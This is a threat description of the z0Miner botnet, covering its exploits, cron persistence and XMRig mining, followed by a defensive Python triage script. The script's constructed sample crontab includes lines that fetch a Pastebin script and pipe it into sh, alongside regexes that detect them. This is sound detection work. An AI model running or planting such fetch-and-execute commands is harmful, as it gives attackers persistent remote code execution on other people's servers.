Z0Miner Description

The z0Miner (also written zoMiner) botnet has updated its toolkit to include years-old vulnerabilities in unpatched ElasticSearch and Jenkins servers. The botnet was first documented in late 2020 by Tencent's security team, which caught it compromising over 5,000 servers by exploiting two pre-auth WebLogic RCE vulnerabilities, CVE-2020-14882 and CVE-2020-14883; the newer ElasticSearch and Jenkins activity was reported by the researchers at Qihoo 360 Netlab. The attackers scanned batches of cloud servers and infected any suitable target with crafted requests.

In the new z0Miner attacks, the operators scan for vulnerable ElasticSearch servers and exploit the RCE vulnerability tracked as CVE-2015-1427 (arbitrary command execution through the Groovy scripting engine, fixed in ElasticSearch 1.3.8 and 1.4.3), while an older RCE exploit is used against Jenkins servers. After breaching a target, the malware first clears the host of competing miners by downloading and running a shell script that kills them. Next, it establishes a cron job that periodically fetches and executes malicious scripts from Pastebin, which gives the operators persistence and an easy way to swap payloads without touching the host again. The final step of the chain delivers the mining payload: z0Miner contacts three different URLs and downloads a config file, a shell script that starts the miner, and a variant of the XMRig miner.
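The two host-side artifacts this chain leaves behind, a cron entry that pulls a script from Pastebin and runs it, and a running XMRig variant, are cheap to check for. The triage helper below is an added example, not code from the original page or from the Tencent or Netlab researchers. It flags crontab lines that fetch from pastebin.com and hand the result to a shell, and process command lines carrying XMRig indicators (the binary name, a stratum pool URL, or the XMRig-specific `--donate-level` flag). The crontab text, process list, paths and paste IDs are all constructed for the example; real campaigns rotate paste URLs and binary names, so treat the patterns as a starting point rather than a signature.

```python
"""Triage helper for z0Miner-style persistence and mining artifacts.

Added example, not part of the original page. Scans (1) crontab lines for
download-and-execute entries that pull from Pastebin and (2) process command
lines for XMRig indicators. All sample data below is constructed.
"""
import re

# A fetch tool whose URL argument points at pastebin.com (no pipe/separator in between).
FETCH_FROM_PASTEBIN = re.compile(r"\b(curl|wget)\b[^|;&]*\bpastebin\.com\b", re.IGNORECASE)
# The fetched content is executed: piped into sh/bash, or a shell is invoked right after.
HANDED_TO_SHELL = re.compile(r"(\|\s*|;\s*|&&\s*)(ba)?sh\b")

# Substrings that identify an XMRig-style miner command line (checked case-insensitively).
XMRIG_MARKERS = ("xmrig", "stratum+tcp://", "stratum+ssl://", "--donate-level")


def suspicious_cron_entries(lines):
    """Return crontab lines that fetch from Pastebin and execute the result."""
    hits = []
    for line in lines:
        stripped = line.strip()
        if not stripped or stripped.startswith("#"):
            continue
        if FETCH_FROM_PASTEBIN.search(stripped) and HANDED_TO_SHELL.search(stripped):
            hits.append(stripped)
    return hits


def xmrig_indicators(cmdline):
    """Return the XMRig markers present in a process command line, in marker order."""
    lowered = cmdline.lower()
    return [m for m in XMRIG_MARKERS if m in lowered]


def triage(crontab_text, processes):
    """Combine both checks. `processes` is an iterable of (pid, cmdline) tuples."""
    miners = []
    for pid, cmdline in processes:
        found = xmrig_indicators(cmdline)
        if found:
            miners.append((pid, cmdline, found))
    return {
        "cron_entries": suspicious_cron_entries(crontab_text.splitlines()),
        "miner_processes": miners,
    }


# Constructed sample crontab (not a real capture); paste IDs are placeholders.
CRON_SAMPLE = """\
# m h dom mon dow command
0 3 * * * /usr/bin/certbot renew --quiet
*/30 * * * * (curl -fsSL https://pastebin.com/raw/EXAMPLE1 || wget -qO- https://pastebin.com/raw/EXAMPLE1) | sh
*/10 * * * * wget -qO /tmp/.x https://pastebin.com/raw/EXAMPLE2 && sh /tmp/.x
"""

# Constructed sample process list, as if from `ps -eo pid,args`. The second miner
# is deliberately renamed: it is caught by its pool URL and flag, not its name.
PROCESS_SAMPLE = [
    (1203, "/usr/sbin/sshd -D"),
    (987, "java -jar /opt/jenkins/jenkins.war"),
    (4417, "/tmp/.X11-unix/.x/xmrig --config=/tmp/.X11-unix/.x/config.json"),
    (4420, "/dev/shm/.svc/worker -o stratum+tcp://pool.example.invalid:3333 --donate-level=1"),
]

if __name__ == "__main__":
    result = triage(CRON_SAMPLE, PROCESS_SAMPLE)
    for entry in result["cron_entries"]:
        print("suspicious cron:", entry)
    for pid, cmdline, found in result["miner_processes"]:
        print(f"possible miner pid={pid} markers={found}: {cmdline}")
```

On a live host, feed it the output of `crontab -l` for each user plus the files under `/etc/cron*`, and the output of `ps -eo pid,args`. A match on the cron side is the more reliable signal: a legitimate job almost never pipes a public paste into `sh`, whereas a renamed miner can drop the `--donate-level` flag and hide the pool URL in its config file, so also inspect any config.json sitting next to an unfamiliar binary in `/tmp` or `/dev/shm`.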

The botnet's current activity has already generated roughly 22 XMR (Monero) for its operators, worth around $4,800 at the exchange rate at the time of writing. The real profit is likely higher, since that figure comes from a single wallet and the campaign may be paying out to several.